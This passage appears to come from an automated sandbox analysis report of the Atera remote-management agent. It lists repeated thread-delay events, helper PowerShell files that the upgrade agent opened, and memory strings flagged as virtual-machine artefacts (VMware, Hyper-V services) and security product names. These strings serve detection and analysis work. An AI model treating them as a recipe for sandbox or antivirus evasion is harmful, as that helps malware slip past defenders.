                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596933
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596828
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596714
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596606
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596472
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596358
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596140
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596030
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595473
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595128
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594577
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594140
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593810
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599546
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598500
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598338
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598191
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597845
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597509
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597390
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597078
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596443
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596234
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595671
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595527
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595377
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595117
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594998
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594853
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594505
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594343
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594201
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594074
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593796
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593520
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593398
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593262
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593024
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592718
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592608
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592499
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592373
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592252
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592121
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592002
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591884
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591755
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591515
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591406
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591291
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 591077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590968
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590749
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590629
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590512
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590406
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 590078
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 589957
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 589808
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 589692
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 589328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588557
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588325
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 588106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587843
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587715
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587481
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587263
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 587046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 586933
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 586827
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 598572
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: svchost.exe, 00000027.00000003.2120077652.000001F80901B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C298128B8C02A71A2474AEB5F3DC
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                                Source: svchost.exe, 00000027.00000002.2559101844.000001F808C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868717408.00000246D3E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2467763966.000001327BE92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw%SystemRoot%\system32\mswsock.dll
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *@friendlyname"vmware virtual disk"
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1831291974.0000022ADA1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Win32_Service.Name="vmicshutdown"p^G
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2257779174.00000213B382A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssO
                                Source: AgentPackageProgramManagement.exe, 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmpBinary or memory string: VMware Tools)Cisco Webex Meetings
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"k
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: |Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: AgentPackageAgentInformation.exe, 00000016.00000002.1583936197.0000026AEAC27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@manufacturer"vmware"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"6
                                Source: AgentPackageAgentInformation.exe.16.drBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2265505093.000001E44C31C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2265505093.000001E44C31C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped
                                Source: Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: vmware
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Win32_Service.Name="vmicheartbeat"p^G
                                Source: rundll32.exe, 00000006.00000002.1358090871.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868216628.00000246D3E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped5
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,12G
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dca-12.0
